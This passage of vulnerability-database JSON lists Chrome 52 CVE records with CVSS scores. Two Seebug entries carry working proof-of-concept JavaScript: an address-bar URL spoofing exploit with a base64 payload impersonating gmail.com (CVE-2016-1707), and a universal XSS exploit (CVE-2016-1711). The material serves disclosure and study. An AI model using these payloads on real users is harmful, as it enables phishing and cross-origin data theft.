"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": 
"REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5131", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5131"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5131", "href": "https://ubuntu.com/security/CVE-2016-5131", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:15", "description": "WebKit/Source/core/html/parser/HTMLPreloadScanner.cpp in Blink, as used in\nGoogle Chrome before 52.0.2743.82, does not consider referrer-policy\ninformation inside an HTML document during a preload request, which allows\nremote attackers to bypass the Content Security Policy (CSP) protection\nmechanism via a crafted web site, as demonstrated by a\n\"Content-Security-Policy: referrer origin-when-cross-origin\" header that\noverrides a \"<META name='referrer' content='no-referrer'>\" element.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5135", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5135"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5135", "href": "https://ubuntu.com/security/CVE-2016-5135", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-04T14:16:17", "description": "WebKit/Source/core/loader/FrameLoader.cpp in Blink, as used in Google\nChrome before 52.0.2743.82, does not disable frame navigation during a\ndetach operation on a DocumentLoader object, which allows remote attackers\nto bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1711", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1711"], 
"modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1711", "href": "https://ubuntu.com/security/CVE-2016-1711", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:18", "description": "Use-after-free vulnerability in WebKit/Source/core/editing/VisibleUnits.cpp\nin Blink, as used in Google Chrome before 52.0.2743.82, allows remote\nattackers to cause a denial of service or possibly have unspecified other\nimpact via crafted JavaScript code involving an @import at-rule in a\nCascading Style Sheets (CSS) token sequence in conjunction with a\nrel=import attribute of a LINK element.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5127", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5127"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5127", "href": "https://ubuntu.com/security/CVE-2016-5127", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:16", "description": "Multiple unspecified vulnerabilities in Google Chrome before 52.0.2743.82\nallow attackers to 
cause a denial of service or possibly have other impact\nvia unknown vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1705", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-1705", "href": "https://ubuntu.com/security/CVE-2016-1705", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-04T14:16:15", "description": "The CSPSource::schemeMatches function in\nWebKit/Source/core/frame/csp/CSPSource.cpp in the Content Security Policy\n(CSP) implementation in Blink, as used in Google Chrome before\n52.0.2743.82, does not apply http :80 policies to https :443 URLs and does\nnot apply ws :80 policies to wss :443 URLs, which makes it easier for\nremote attackers to determine whether a specific HSTS web site has been\nvisited by reading a CSP report. 
NOTE: this vulnerability is associated\nwith a specification change after CVE-2016-1617 resolution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5137", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1617", "CVE-2016-5137"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5137", "href": "https://ubuntu.com/security/CVE-2016-5137", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-04T14:16:15", "description": "net/proxy/proxy_service.cc in the Proxy Auto-Config (PAC) feature in Google\nChrome before 52.0.2743.82 does not ensure that URL information is\nrestricted to a scheme, host, and port, which allows remote attackers to\ndiscover credentials by operating a server with a PAC script, a related\nissue to CVE-2016-3763.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, 
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5134", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3763", "CVE-2016-5134"], "modified": "2016-07-23T00:00:00", "id": "UB:CVE-2016-5134", "href": "https://ubuntu.com/security/CVE-2016-5134", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T12:07:54", "description": "Source links:\r\n* http://xlab.tencent.com/cn/2016/10/11/CVE-2016-1707-Chrome-Address-Bar-URL-Spoofing-on-IOS/\r\n* (English version) http://xisigr.com/x/cve-2016-1707/\r\n\r\n### 0x00 Vulnerability Overview\r\n\r\nThis is the Chrome browser address bar spoofing vulnerability (CVE-2016-1707). The author reported it to Google in June 2016 and is now sharing the details. A URL spoofing vulnerability can forge a legitimate website address. An attacker can use this vulnerability to launch phishing attacks against users.\r\n\r\nAffected versions: Chrome < v52.0.2743.82, IOS < v10\r\n\r\n### 0x01 Vulnerability 
Details\r\n\r\nPOC:\r\n\r\n```\r\n<script>\r\n\r\npayload=\"PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=\";\r\n\r\nfunction pwned() {\r\n var t = window.open('https://www.gmail.com/', 'aaaa');\r\n t.document.write(atob(payload));\r\n t.document.write(\"<h1>Address bar says https://www.gmail.com/ - this is NOT https://www.gmail.com/</h1>\");\r\n}\r\n\r\n</script>\r\n\r\n<a href=\"https://hack.com::/\" target=\"aaaa\" onclick=\"setTimeout('pwned()','500')\">click me</a><br>\r\n```\r\n\r\nSo how does this vulnerability arise? The author will now walk through the loading process of the code. First, clicking the click me link makes the browser open a new window named aaaa, and that page loads `https://hack.com::`; this address can be anything. After 500 microseconds pwned() runs and opens `https://www.gmail.com` in the aaaa window; this URL can of course be empty. Up to this point all of the code runs normally. The next piece of code is the core code that triggers the vulnerability.\r\n\r\nThe base64-encoded payload code:\r\n\r\n```\r\n<body></body>\r\n \r\n<script>\r\n \r\n var link = document.createElement('a');\r\n \r\n link.href = 'https://gmail.com::';\r\n \r\n document.body.appendChild(link);\r\n \r\n link.click();\r\n 
\r\n</script>\r\n```\r\n\r\nNext, this code starts to commit `https://gmail.com::` in the aaaa window page. This is the curious part: `https://gmail.com::` is an invalid address, so how can it be committed? After trying several methods, the author found that clicking an a tag achieves it (window.open/location do not) and leaves the invalid address in a pending status. At this point Chrome has actually loaded about:blank (it is already in the `about:blank` domain), but when deciding what to finally display in the URL address bar, Chrome chooses the pending `https://gmail.com::` as the final committed address. Once loaded, `https://gmail.com::` is displayed in the address bar as `https://gmail.com`, with the two colons hidden. At this point the whole loading process is complete, and a perfect URL spoofing vulnerability results.\r\n\r\nOnline demo:\r\n\r\nhttp://xisigr.com/test/spoof/chrome/1.html\r\n\r\nhttp://xisigr.com/test/spoof/chrome/2.html\r\n\r\nIf you have not upgraded yet (Chrome < v52.0.2743.82, IOS < v10), you can try running these two demos on the author's site.\r\n\r\n### 0x02 
How it was fixed\r\n\r\nThe crux of this vulnerability is that Chrome allowed an invalid address to be committed while a web page was loading. Google's patch is based on exactly this: an invalid address may no longer be committed while a web page is loading, and if an invalid address is detected, the current URL is set directly to about:blank.\r\n\r\n```\r\n[self optOutScrollsToTopForSubviews];\r\n \r\n // Ensure the URL is as expected (and already reported to the delegate).\r\n \r\n- DCHECK(currentURL == _lastRegisteredRequestURL)\r\n \r\n+ // If |_lastRegisteredRequestURL| is invalid then |currentURL| will be\r\n \r\n+ // \"about:blank\".\r\n \r\n+ DCHECK((currentURL == _lastRegisteredRequestURL) ||\r\n \r\n+ (!_lastRegisteredRequestURL.is_valid() &&\r\n \r\n+ _documentURL.spec() == url::kAboutBlankURL))\r\n \r\n << std::endl\r\n \r\n << \"currentURL = [\" << currentURL << \"]\" << std::endl\r\n \r\n << \"_lastRegisteredRequestURL = [\" << _lastRegisteredRequestURL << \"]\";\r\n \r\n // This is the point where the document's URL has actually changed, and\r\n \r\n // pending navigation information should be applied to state information.\r\n \r\n [self setDocumentURL:net::GURLWithNSURL([_webView URL])];\r\n \r\n- DCHECK(_documentURL == _lastRegisteredRequestURL);\r\n \r\n+\r\n \r\n+ if (!_lastRegisteredRequestURL.is_valid() &&\r\n \r\n+ _documentURL != _lastRegisteredRequestURL) {\r\n \r\n+ // if |_lastRegisteredRequestURL| is an invalid URL, then |_documentURL|\r\n \r\n+ // will be \"about:blank\".\r\n \r\n+ [[self sessionController] updatePendingEntry:_documentURL];\r\n \r\n+ }\r\n \r\n+ DCHECK(_documentURL == _lastRegisteredRequestURL ||\r\n \r\n+ (!_lastRegisteredRequestURL.is_valid() &&\r\n \r\n+ _documentURL.spec() == 
url::kAboutBlankURL));\r\n \r\n+\r\n \r\n self.webStateImpl->OnNavigationCommitted(_documentURL);\r\n \r\n [self commitPendingNavigationInfo];\r\n \r\n if ([self currentBackForwardListItemHolder]->navigation_type() ==\r\n```\r\n\r\n### 0x03 Disclosure timeline\r\n\r\n2016/6/22 Reported to Google, https://bugs.chromium.org/\r\n\r\n2016/6/22 Google confirmed the vulnerability, severity High\r\n\r\n2016/7/14 Google confirmed a $3000 reward\r\n\r\n2016/7/20 Google published the security advisory, CVE-2016-1707\r\n\r\n2016/10/2 Google made the vulnerability public\r\n\r\n### 0x04 Related links\r\n\r\n\r\n[1] https://googlechromereleases.blogspot.com/2016/07/stable-channel-update.html\r\n\r\n[2] https://bugs.chromium.org/p/chromium/issues/detail?id=622183\r\n\r\n[3] https://chromium.googlesource.com/chromium/src/+/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5", "cvss3": {}, "published": "2016-10-11T00:00:00", "type": "seebug", "title": "Chrome Address Bar URL Spoofing on IOS", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1707"], "modified": "2016-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92469", "id": "SSV:92469", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T12:05:03", "description": "#### VULNERABILITY DETAILS\r\nFrameLoader::loadInSameDocument is vulnerable to a problem similar to the one described in issue 613266:\r\n\r\n```\r\nvoid FrameLoader::loadInSameDocument(const KURL& url, (...))\r\n{\r\n (...)\r\n // If we have a provisional request for a different document, a fragment scroll should cancel it.\r\n detachDocumentLoader(m_provisionalDocumentLoader);\r\n if (!m_frame->host())\r\n return;\r\n (...)\r\n}\r\n```\r\n\r\nCalling FrameLoader::startLoad in the middle of detaching |m_provisionalDocumentLoader| will cause the new provisional loader to be cleared prematurely. 
In this case, |m_provisionalDocumentLoader| isn't set up afterwards, so the attacker has to take care of it explicitly after the hash navigation in order to avoid crashes.\r\n\r\n#### VERSION\r\nChrome 51.0.2704.79 (Stable) \r\nChrome 52.0.2743.24 (Beta) \r\nChrome 53.0.2756.0 (Dev) \r\nChromium 53.0.2760.0 (Release build compiled today)", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "seebug", "title": "Chrome Universal XSS via same document navigations (CVE-2016-1711)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1711"], "modified": "2017-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93002", "id": "SSV:93002", "sourceData": "\n <script>\r\nvar i = document.documentElement.appendChild(document.createElement('iframe'));\r\nvar d = i.contentDocument.open();\r\nvar s = d.appendChild(d.createElement('iframe'));\r\n\r\nonload = function() {\r\n var a = d.createElement('a');\r\n a.href = 'data:text/xml,';\r\n a.click();\r\n}\r\n\r\ns.contentWindow.onunload = function() {\r\n stop();\r\n setTimeout(g, 1);\r\n}\r\n\r\nfunction g() {\r\n i.onload = function() {\r\n var x = d.createElement('form');\r\n x.action = 'javascript:alert(location)';\r\n x.submit();\r\n }\r\n i.src = 'https://abc.xyz';\r\n}\r\n\r\nfunction f() {\r\n var a = d.createElement('a');\r\n a.href = 'data:text/html,';\r\n a.click();\r\n d.close();\r\n a = d.createElement('a');\r\n a.href = '#';\r\n a.click();\r\n a = d.createElement('a');\r\n a.href = 'http://www.apple.com';\r\n a.click();\r\n}\r\n\r\nsetTimeout(f, 100);\r\n</script>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93002", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "alpinelinux": [{"lastseen": "2023-06-07T13:05:29", "description": "Google V8 before 5.2.361.32, as used in Google Chrome before 52.0.2743.82, does not properly process left-trimmed objects, which allows remote attackers to cause a denial of service (memory corruption) or 
possibly have unspecified other impact via crafted JavaScript code.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-07T13:04:02", "type": "alpinelinux", "title": "CVE-2016-5129", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129"], "modified": "2023-06-07T13:04:02", "id": "ALPINE:CVE-2016-5129", "href": "https://security.alpinelinux.org/vuln/CVE-2016-5129", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T13:05:07", "description": "Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": 
"REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-07T13:04:02", "type": "alpinelinux", "title": "CVE-2016-5131", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege&